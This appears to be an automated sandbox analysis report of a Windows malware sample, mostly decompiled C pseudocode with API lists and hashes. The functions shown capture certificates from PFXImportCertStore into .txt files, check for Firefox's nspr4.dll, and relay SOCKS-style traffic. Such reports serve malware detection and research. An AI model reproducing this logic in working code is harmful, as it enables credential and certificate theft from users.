									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
									if(_t50 == 0) {
										L17:
										_v5 = _v5 + 1;
										if(_v5 < 0xfa) {
											continue;
										}
										break;
									}
									_t58 =  &_v664;
									if(_v664 == 0) {
										L12:
										if(_t77 != 1) {
											_t65 =  &_v664;
											L16:
											_t50 = E00412969(0, _t65, _a4, _t90);
											if(_t50 == 0) {
												break;
											}
											goto L17;
										}
										_t50 = E0041BC2F( &_v664,  &_v2224,  &_v1184);
										_t90 = _t50;
										if(_t50 == 0) {
											goto L17;
										}
										_t65 =  &_v2224;
										goto L16;
									} else {
										goto L9;
									}
									do {
										L9:
										if( *_t58 == 0x2f) {
											_t66 = 0x5c;
											 *_t58 = _t66;
										}
										_t58 = _t58 + 2;
									} while ( *_t58 != 0);
									goto L12;
								}
								return _t50;
							}
						}
					}
				}
				return _t33;
			}

0x004127f5
0x004127f6
0x004127fb
0x00412809
0x00412811
0x00412821
0x00412828
0x00412833
0x00412834
0x00412849
0x00412850
0x0041285d
0x00412866
0x00412871
0x00412872
0x0041287c
0x0041287d
0x00412887
0x00412888
0x0041288d
0x00412891
0x00412895
0x00412899
0x0041289c
0x0041289d
0x004128a0
0x004128aa
0x00000000
0x00000000
0x004128c0
0x004128c6
0x004128cb
0x00000000
0x00000000
0x004128ec
0x004128f4
0x00412955
0x00412955
0x0041295c
0x00000000
0x00000000
0x00000000
0x0041295c
0x004128f6
0x00412903
0x00412919
0x0041291c
0x00412943
0x00412949
0x0041294c
0x00412953
0x00000000
0x00000000
0x00000000
0x00412953
0x00412932
0x00412937
0x00412939
0x00000000
0x00000000
0x0041293b
0x00000000
0x00000000
0x00000000
0x00000000
0x00412905
0x00412905
0x00412909
0x0041290d
0x0041290e
0x0041290e
0x00412911
0x00412914
0x00000000
0x00412905
0x00000000
0x00412962
0x00412866
0x00412850
0x00412828
0x00412966

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 00412809

Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0041285D
GetPrivateProfileIntW.KERNEL32 ref: 004128C0
GetPrivateProfileStringW.KERNEL32 ref: 004128EC

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: PathPrivateProfile$AttributesCombineFileFolderString
String ID:
API String ID: 1702184609-0
Opcode ID: 74714b4306295cb19873d9b916e12b1444ac21f756429fa9481bd38333695ab7
Instruction ID: 3087a919dfb70da80075aed87c75a41ef7ae3cf14a508dd3e6ebedaebcf8c4f1
Opcode Fuzzy Hash: 74714b4306295cb19873d9b916e12b1444ac21f756429fa9481bd38333695ab7
Instruction Fuzzy Hash: 0241B4B2A002186ADF20EBA4DD45EDF73BCAB05314F0005A7F608F7191D7B49F8A8B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041C83D, Relevance: 6.1, APIs: 4, Instructions: 86commemoryCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?,?,?,?,?,?,?,?,?,0040A333,?,?), ref: 0041C863
VariantInit.OLEAUT32(?), ref: 0041C8AF
SysAllocString.OLEAUT32(?), ref: 0041C8BF
VariantClear.OLEAUT32(?), ref: 0041C8F8

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Variant$AllocClearCreateInitInstanceString
String ID:
API String ID: 3126708813-0
Opcode ID: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
Instruction ID: dd0e7c70390be49303fea1791e94dfec46ed251a0cca32237a0152ea63f65da7
Opcode Fuzzy Hash: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
Instruction Fuzzy Hash: 3B217171940228AFCB10DBA4CCC8EEF7BBCEF09750F1005A5F906EB291D6759940CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041C361, Relevance: 6.1, APIs: 4, Instructions: 84
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C361(signed int __edx, void** __esi, void* _a4, signed int _a8) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t26;
				signed int _t29;
				signed int _t46;
				void** _t48;

				_t48 = __esi;
				_t46 = __edx;
				_v5 = 0;
				if(_a8 <= 0xa00000) {
					_t26 = E0041B6AE( *__esi);
					_v36 = _t26;
					_v32 = _t46;
					if((_t26 & _t46) != 0xffffffff && E0041B68E( *__esi, 0, 0, 2) != 0) {
						_t29 = E0041B6AE( *__esi);
						_v28 = _t29;
						_v24 = _t46;
						if((_t29 & _t46) != 0xffffffff) {
							E0041645B( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ _a8;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
								E0041B68E( *_t48, _v28, _v24, 0);
								SetEndOfFile( *_t48);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t48);
						E0041B68E( *_t48, _v36, _v32, 0);
					}
				}
				return _v5;
			}

0x0041c361
0x0041c361
0x0041c372
0x0041c375
0x0041c37d
0x0041c382
0x0041c387
0x0041c38d
0x0041c3a8
0x0041c3ad
0x0041c3b2
0x0041c3b8
0x0041c3c1
0x0041c3d3
0x0041c3e6
0x0041c418
0x0041c41f
0x0041c409
0x0041c409
0x0041c409
0x0041c3e6
0x0041c427
0x0041c436
0x0041c436
0x0041c38d
0x0041c441

APIs

Part of subcall function 0041B6AE: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,004051C6,?,?,?), ref: 0041B6C3

Part of subcall function 0041B68E: SetFilePointerEx.KERNEL32(?,?,?,00000000,?,0041C495,?,?,00000000,00000001,?,004051C6,?,?,?), ref: 0041B6A0

WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0041C3E2
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 0041C3FB
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0041C41F
FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0041C427

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: File$PointerWrite$BuffersFlush
String ID:
API String ID: 1289656144-0
Opcode ID: 26814eebbb2ddee8fc7778f59fbab11eba2d74ef0c8da63d0415d118eb86ba68
Instruction ID: 86b21c03c2c4f513a1a12868d7b4eecc27ddc3b7b4e738ea07b5aef058b3814c
Opcode Fuzzy Hash: 26814eebbb2ddee8fc7778f59fbab11eba2d74ef0c8da63d0415d118eb86ba68
Instruction Fuzzy Hash: F331CE72844108FFDF119FA4CC81EEEBBB9FF08344F10852AF290A1161D73A8991DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041D1EE, Relevance: 6.1, APIs: 4, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D1EE(void* __ebx, void* __ecx) {
				char _v20;
				char* _v84;
				char _v92;
				char _v196;
				char _v716;
				void* __edi;
				void* __esi;
				void* _t15;
				void* _t31;
				void* _t35;
				void* _t36;
				char _t37;
				void** _t43;

				_t36 = __ecx;
				_t35 = __ebx;
				_t15 =  *(__ebx + 0x180);
				if(_t15 == 0 || WaitForSingleObject(_t15, 0) != 0x102) {
					_t2 = _t35 + 0x17c; // 0x17c
					_t43 = _t2;
					E00417DB7(_t43);
					E0040F0DC(_t36,  &_v716, 1);
					E0040ED80(0x2937498d,  &_v196, 0);
					_t37 = 0x44;
					E0041645B( &_v92,  &_v92, 0, _t37);
					_v92 = _t37;
					_v84 =  &_v196;
					ResetEvent( *(_t35 + 0xc));
					if(E00417C6F( &_v716, L"-v", 0,  &_v92,  &_v20) != 0) {
						E004163E4(_t43,  &_v20, 0x10);
						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
							goto L6;
						} else {
							TerminateProcess( *_t43, 0);
							E00417DB7(_t43);
							goto L3;
						}
					} else {
						L3:
						_t31 = 0;
					}
				} else {
					L6:
					_t31 = 1;
				}
				return _t31;
			}

0x0041d1ee
0x0041d1ee
0x0041d1f1
0x0041d201
0x0041d217
0x0041d217
0x0041d21d
0x0041d22a
0x0041d23e
0x0041d245
0x0041d24c
0x0041d25a
0x0041d25d
0x0041d260
0x0041d282
0x0041d28f
0x0041d2a4
0x00000000
0x0041d2a6
0x0041d2a9
0x0041d2af
0x00000000
0x0041d2af
0x0041d284
0x0041d284
0x0041d284
0x0041d284
0x0041d2b6
0x0041d2b6
0x0041d2b6
0x0041d2b6
0x0041d2bb

APIs

WaitForSingleObject.KERNEL32(?,00000000,?,74B5F6F0), ref: 0041D206
ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001,?,74B5F6F0), ref: 0041D260
WaitForSingleObject.KERNEL32(?,000003E8,0000017C,?,00000010,?,00404B7C,00000000,?,?,?,74B5F6F0), ref: 0041D29C
TerminateProcess.KERNEL32(0000017C,00000000,?,74B5F6F0), ref: 0041D2A9

Part of subcall function 00417DB7: CloseHandle.KERNEL32(00000000,74B5F560,00408019,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00417DC6
Part of subcall function 00417DB7: CloseHandle.KERNEL32(00000000,74B5F560,00408019,00000000,004228E0,00000000,0040814E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 00417DCF

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
String ID:
API String ID: 401097067-0
Opcode ID: ea62d19cbb0a0431406a02fedd977ef4f6b89a9ba84c8f04f5972e1b590d8b0f
Instruction ID: 4a4c91e14d89cf9cf2b8269b0528476d436870fffab8804c9f057a34f51dc59c
Opcode Fuzzy Hash: ea62d19cbb0a0431406a02fedd977ef4f6b89a9ba84c8f04f5972e1b590d8b0f
Instruction Fuzzy Hash: 3111A571900208ABEB50ABA1DC49FEE777CEF84704F0441BBF904FA055D778D585CA68

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA7D, Relevance: 6.0, APIs: 4, Instructions: 45
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FA7D(void* __eflags) {
				void* _t1;
				void* _t2;
				void* _t3;
				long _t6;
				void* _t11;

				_t1 = E0040EDBB(_t11, __eflags, 0x19367401, 1);
				_t19 = _t1;
				if(_t1 != 0) {
					_t2 = E0040EEE1();
					__eflags = _t2;
					if(_t2 != 0) {
						SetThreadPriority(GetCurrentThread(), 0xfffffff1);
						_t6 = WaitForSingleObject( *0x42305c, 0x1388);
						while(1) {
							__eflags = _t6 - 0x102;
							if(_t6 != 0x102) {
								goto L6;
							}
							E00415AB4();
							_t6 = WaitForSingleObject( *0x42305c, 0x1388);
						}
					}
					L6:
					E00419B7B(_t19);
					_t3 = 0;
					__eflags = 0;
				} else {
					_t3 = _t1 + 1;
				}
				return _t3;
			}

0x0040fa8e
0x0040fa93
0x0040fa97
0x0040fa9c
0x0040faa1
0x0040faa3
0x0040faae
0x0040fac6
0x0040fadd
0x0040fadd
0x0040fadf
0x00000000
0x00000000
0x0040facf
0x0040fadb
0x0040fadb
0x0040fadd
0x0040fae1
0x0040fae2
0x0040fae7
0x0040fae7
0x0040fa99
0x0040fa99
0x0040fa99
0x0040faf0

APIs

Part of subcall function 0040EDBB: CreateMutexW.KERNEL32(00422BD0,00000000,?,?,?,?,?), ref: 0040EDDC

GetCurrentThread.KERNEL32 ref: 0040FAA7
SetThreadPriority.KERNEL32(00000000), ref: 0040FAAE
WaitForSingleObject.KERNEL32(00001388), ref: 0040FAC6

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
String ID:
API String ID: 3441234504-0
Opcode ID: d6194b26e9e83bb08f35f87aeae499a7cdcf98306a51956291d66627feef7e96
Instruction ID: 5e41fbfb5b90545927457ec579b36da94973f3bc3e8f05cae4b2341ffd15a578
Opcode Fuzzy Hash: d6194b26e9e83bb08f35f87aeae499a7cdcf98306a51956291d66627feef7e96
Instruction Fuzzy Hash: 0CF02B313042186ACB2177A66C45897374DDB45365B240377FD15F26F1E97A4C4149FD

Uniqueness

Uniqueness Score: -1.00%

Function 00419B15, Relevance: 6.0, APIs: 4, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419B15(HANDLE* _a4) {
				struct tagMSG _v28;
				long _t16;

				while(1) {
					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
					if(_t16 != 1) {
						break;
					}
					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
						if(_v28.message != 0x12) {
							TranslateMessage( &_v28);
							DispatchMessageW( &_v28);
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t16;
			}

0x00419b5c
0x00419b68
0x00419b6d
0x00000000
0x00000000
0x00419b48
0x00419b30
0x00419b37
0x00419b42
0x00000000
0x00419b42
0x00000000
0x00419b30
0x00419b48
0x00419b70
0x00419b78

APIs

PeekMessageW.USER32 ref: 00419B52
MsgWaitForMultipleObjects.USER32 ref: 00419B66

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: MessageMultipleObjectsPeekWait
String ID:
API String ID: 3986374578-0
Opcode ID: 48622f7d25ea60df21fb18c351a08da3bbbc9717bb0aeff12fa16d3d1242fedf
Instruction ID: dc615b350561e98b7e1621ce7ac628e4798ed18076dc88d8d14c15904d5946ec
Opcode Fuzzy Hash: 48622f7d25ea60df21fb18c351a08da3bbbc9717bb0aeff12fa16d3d1242fedf
Instruction Fuzzy Hash: 32F0FC325083196BD710AA99EC48DA7BB9CFB45394F44053AFA01D3171D176BC4487B5

Uniqueness

Uniqueness Score: -1.00%

Function 004069DC, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004069DC(void* __eflags, signed int _a4) {
				char _v9;
				char _v13;
				char _v20;
				signed int _v24;
				signed int _v29;
				short _v31;
				signed char _v32;
				intOrPtr _v36;
				signed int _v48;
				short _v50;
				char _v52;
				char _v312;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t59;
				void* _t61;
				short _t77;
				void* _t79;
				void* _t84;
				char _t103;
				char* _t105;
				signed int _t115;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				char _t129;
				void* _t131;
				intOrPtr _t132;
				void* _t133;

				_t110 = _a4;
				_t59 = E00419960(_t110);
				_push(0);
				_push( &_v32);
				_t61 = 7;
				_v24 = 0 | _t59 == 0x00000017;
				if(E0041935B(_t61, _t110) != 0) {
					while(E0041935B(1, _t110,  &_v9, 0) != 0) {
						if(_v9 == 0) {
							_t115 = _v29;
							_t116 = _t115 << 0x10;
							_v13 = 0x5a;
							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								L20:
								_v9 = 1;
								if(_v13 != 0x5a) {
									L44:
									return E00406966(_t110, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
								}
								E0041645B( &_v52,  &_v52, 0, 0x10);
								_t77 = 2;
								_v52 = _t77;
								_t79 = (_v32 & 0x000000ff) - 1;
								if(_t79 == 0) {
									_v50 = _v31;
									_v48 = _v29;
									_t127 = E004193F0( &_v52);
									if(_t127 == 0xffffffff) {
										L23:
										_v13 = 0x5b;
										goto L44;
									}
									E004197A3(_t116, _t127);
									_t84 = E00406966(_t110, _t127, 0x5a, _v24);
									if(_t84 != 1) {
										if(_t84 != 0xffffffff) {
											_v9 = 0;
										} else {
											_v13 = 0x5b;
										}
									} else {
										_push(_t127);
										_t84 = E004195A4(_t110);
									}
									E0041974B(_t84, _t127);
									if(_v9 != 1 || _v13 == 0x5a) {
										L34:
										return _v9;
									} else {
										goto L44;
									}
								}
								if(_t79 == 1) {
									_t129 = E004194EA( &_v52, 1);
									_v20 = _t129;
									if(_t129 == 0xffffffff) {
										goto L23;
									}
									_t125 = E00406966(_t110, _t129, 0x5a, _v24);
									if(_t125 != 1) {
										L31:
										E0041974B(_t89, _t129);
										if(_t125 == 0xffffffff) {
											goto L23;
										}
										if(_t125 != 1) {
											_v9 = 0;
										}
										goto L34;
									}
									_t126 = E0041971B( &_v20,  &_a4);
									_v36 = _t126;
									E0041974B(_t93, _v20);
									if(_t126 != 0xffffffff) {
										E004197A3(_t116, _t126);
										_t110 = _a4;
										_t125 = E00406966(_a4, _t126, 0x5a, _v24 | 0x00000002);
										if(_t125 == 1) {
											_push(_v36);
											_t89 = E004195A4(_t110);
										}
										_t129 = _v36;
										goto L31;
									}
									_t110 = _a4;
									_v13 = 0x5b;
									goto L44;
								}
								goto L23;
							}
							_t131 = 0;
							while(1) {
								_t116 = _t110;
								if(E0041935B(1, _t110,  &_v9, 0) == 0) {
									goto L1;
								}
								_t103 = _v9;
								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
								if(_t103 == 0) {
									_t105 =  &_v312;
									_v20 = 0;
									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
									if(_t105 == 0) {
										_t132 = _v20;
										while(_t132 != 0) {
											if( *((intOrPtr*)(_t132 + 4)) == 2) {
												E004163E4( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
												L19:
												__imp__freeaddrinfo(_v20);
												if(_t132 == 0) {
													goto L12;
												}
												goto L20;
											}
											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
										}
										goto L19;
									}
									L12:
									_v13 = 0x5b;
									goto L20;
								}
								_t131 = _t131 + 1;
								if(_t131 <= 0xff) {
									continue;
								}
								goto L1;
							}
							goto L1;
						}
					}
				}
				L1:
				return 0;
			}

0x004069e6
0x004069ec
0x004069fc
0x00406a00
0x00406a03
0x00406a04
0x00406a10
0x00406a1f
0x00406a1d
0x00406a34
0x00406a4d
0x00406a5b
0x00406a64
0x00406aee
0x00406af2
0x00406af6
0x00406c24
0x00000000
0x00406c34
0x00406b03
0x00406b0a
0x00406b0b
0x00406b13
0x00406b14
0x00406bc8
0x00406bd2
0x00406bda
0x00406bdf
0x00406b1d
0x00406b1d
0x00000000
0x00406b1d
0x00406be6
0x00406bf2
0x00406bfa
0x00406c07
0x00406c0f
0x00406c09
0x00406c09
0x00406c09
0x00406bfc
0x00406bfc
0x00406bfd
0x00406bfd
0x00406c13
0x00406c1c
0x00406bba
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c1c
0x00406b1b
0x00406b30
0x00406b32
0x00406b38
0x00000000
0x00000000
0x00406b46
0x00406b4b
0x00406ba3
0x00406ba3
0x00406bab
0x00000000
0x00000000
0x00406bb4
0x00406bb6
0x00406bb6
0x00000000
0x00406bb4
0x00406b5d
0x00406b5f
0x00406b62
0x00406b6a
0x00406b79
0x00406b81
0x00406b91
0x00406b96
0x00406b98
0x00406b9b
0x00406b9b
0x00406ba0
0x00000000
0x00406ba0
0x00406b6c
0x00406b6f
0x00000000
0x00406b6f
0x00000000
0x00406b1b
0x00406a6a
0x00406a6c
0x00406a74
0x00406a7d
0x00000000
0x00000000
0x00406a7f
0x00406a82
0x00406a8b
0x00406aa1
0x00406aa8
0x00406aab
0x00406ab3
0x00406abb
0x00406ac9
0x00406ac4
0x00406adc
0x00406ae1
0x00406ae4
0x00406aec
0x00000000
0x00000000
0x00000000
0x00406aec
0x00406ac6
0x00406ac6
0x00000000
0x00406acd
0x00406ab5
0x00406ab5
0x00000000
0x00406ab5
0x00406a8d
0x00406a94
0x00000000
0x00000000
0x00000000
0x00406a96
0x00000000
0x00406a6c
0x00406a1d
0x00406a1f
0x00406a12
0x00000000

APIs

Part of subcall function 00419960: getsockname.WS2_32(?,?,?), ref: 0041997E

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00406AAB
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 00406AE4

Part of subcall function 004197A3: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004197B9

Part of subcall function 00406966: getpeername.WS2_32(000000FF,?,?), ref: 0040698A

Part of subcall function 004195A4: select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 00419644

Strings

Z, xrefs: 00406C1E

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
String ID: Z
API String ID: 1849152701-1505515367
Opcode ID: 13409f4bd4ff2b436bbba123a69fc7bb46ce568d98e34d7e3fb09613ec1f9c84
Instruction ID: 4b257c487b56122188975d2a837a49f7360739d30df9cc7a04033035c71775bc
Opcode Fuzzy Hash: 13409f4bd4ff2b436bbba123a69fc7bb46ce568d98e34d7e3fb09613ec1f9c84
Instruction Fuzzy Hash: 96612971A001186ADF20AAA4CC41AEFB7B99F46314F06417BF952F72C1C27C9951CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041D7B6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
timeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041D7B6(intOrPtr __eax, void* __ecx, intOrPtr* _a4, intOrPtr* _a8, signed int _a12) {
				char _v536;
				char _v600;
				char _v728;
				char _v744;
				struct _SYSTEMTIME _v760;
				intOrPtr _v764;
				intOrPtr _v772;
				intOrPtr _v776;
				char _v784;
				void* __edi;
				void* __esi;
				void* _t47;
				void* _t58;
				intOrPtr* _t59;
				void* _t61;
				void* _t65;
				intOrPtr* _t66;
				void* _t67;
				void* _t71;
				char* _t74;
				signed int _t76;
				void* _t78;
				void* _t79;

				_t61 = __ecx;
				_t78 = (_t76 & 0xfffffff8) - 0x2fc;
				_t59 = _a4;
				__imp__PFXImportCertStore(_t59, _a8, _a12, _t67, _t71, _t58);
				_v776 = __eax;
				if(__eax != 0 && (_a12 & 0x10000000) == 0 && _t59 != 0 &&  *_t59 > 0 &&  *((intOrPtr*)(_t59 + 4)) != 0 && E0040EEE1() != 0) {
					GetSystemTime( &_v760);
					E0040FA33(0xaa,  &_v600);
					_t74 =  &_v744;
					E0040FA33(0xab, _t74);
					E0041D595( &_v536, _t61);
					_push(_v760.wYear & 0x0000ffff);
					_push(_v760.wMonth & 0x0000ffff);
					_push(_v760.wDay & 0x0000ffff);
					_push(_t74);
					_push( &_v536);
					_push( &_v600);
					_t65 = 0x3e;
					_t47 = E0041709B( &_v600, _t65,  &_v728);
					_t79 = _t78 + 0x18;
					if(_t47 > 0 && E00405780(_t61, _t65, 2, 0,  &_v728,  *((intOrPtr*)(_t59 + 4)),  *_t59) != 0) {
						_t66 = _a8;
						if(_t66 != 0 &&  *_t66 != 0) {
							 *((short*)(E004163E4(_t79 + 0x48 + E00416EF7( &_v728) * 2, L".txt", 8) + 8)) = 0;
							_t64 = _t66;
							if(E004171FF(_t52 | 0xffffffff, _t66,  &_v784) != 0) {
								E00405780(_t64, _t66, 2, 0,  &_v728, _v772, _v764);
								E004171ED( &_v784);
							}
						}
					}
				}
				return _v776;
			}

0x0041d7b6
0x0041d7bc
0x0041d7c3
0x0041d7cf
0x0041d7d5
0x0041d7db
0x0041d81b
0x0041d82d
0x0041d832
0x0041d83b
0x0041d847
0x0041d851
0x0041d857
0x0041d85d
0x0041d860
0x0041d868
0x0041d870
0x0041d873
0x0041d878
0x0041d87d
0x0041d882
0x0041d89a
0x0041d89f
0x0041d8c2
0x0041d8cd
0x0041d8d6
0x0041d8e8
0x0041d8ed
0x0041d8ed
0x0041d8d6
0x0041d89f
0x0041d882
0x0041d8fc

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 0041D7CF

Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9

GetSystemTime.KERNEL32(?), ref: 0041D81B

Part of subcall function 0041D595: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0041D6EC,?,?,00000000), ref: 0041D5AA

Strings

.txt, xrefs: 0041D8B1

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
String ID: .txt
API String ID: 1412380219-2195685702
Opcode ID: 11ba04b996bde7f2d635745290795b6e1f62cac37877c571f40ebcf401ad2342
Instruction ID: 5568e0f4f6a53af6ca8cd525595dc951203973f07148f55f77621705704d7155
Opcode Fuzzy Hash: 11ba04b996bde7f2d635745290795b6e1f62cac37877c571f40ebcf401ad2342
Instruction Fuzzy Hash: 4031F271604350ABCB20EF55CC85BEBB7A8EF88304F04492FBA94D7291D738D985C766

Uniqueness

Uniqueness Score: -1.00%

Function 00409C6E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040321C,00000000,00004401,0040322C,?), ref: 00409C9E
CoCreateInstance.OLE32(004031EC,00000000,00004401,004031FC,?), ref: 00409CF1

Strings

D, xrefs: 00409D1C

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateInstance
String ID: D
API String ID: 542301482-2746444292
Opcode ID: b88a0654aedd0336900518790cbf40bc6efd15565401763a969c4e914b4eb289
Instruction ID: 89b15946e97b8f10c8de4a400459779f3e6863da8477c7bdb9e5d9500fc25018
Opcode Fuzzy Hash: b88a0654aedd0336900518790cbf40bc6efd15565401763a969c4e914b4eb289
Instruction Fuzzy Hash: 0E315AB2644206AFE710DF64CC85D6BB7ECAF84744F00052EF954A7281D735DD058BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00412A50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412A50(struct HINSTANCE__* __eax) {
				char _v8;
				char _v20;
				char _v108;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t11;
				void* _t18;
				signed int _t25;
				short* _t33;
				void* _t43;

				_t11 = __eax;
				_t33 = __eax;
				if( *0x422e04 > 1) {
					_t11 = GetModuleHandleW(L"nspr4.dll");
					if(_t11 != 0) {
						if(_t33 == 0 ||  *_t33 == 0) {
							return E004127E2(__eflags, 0);
						}
						_t11 = E00416390(2 + E00416EF7(_t33) * 4);
						_t31 = _t11;
						if(_t11 != 0) {
							_t25 = E004171FF(E004172B4(_t33, _t31) | 0xffffffff, _t31,  &_v20);
							_t11 = E004163A8(_t31);
							if(_t25 != 0) {
								_t18 = 0x31;
								E0040F9FD(_t18,  &_v108);
								_t43 = E0041716C( &_v8,  &_v108, _v20);
								_t11 = E004171ED( &_v20);
								_t44 = _t25 & 0xffffff00 | _t43 > 0x00000000;
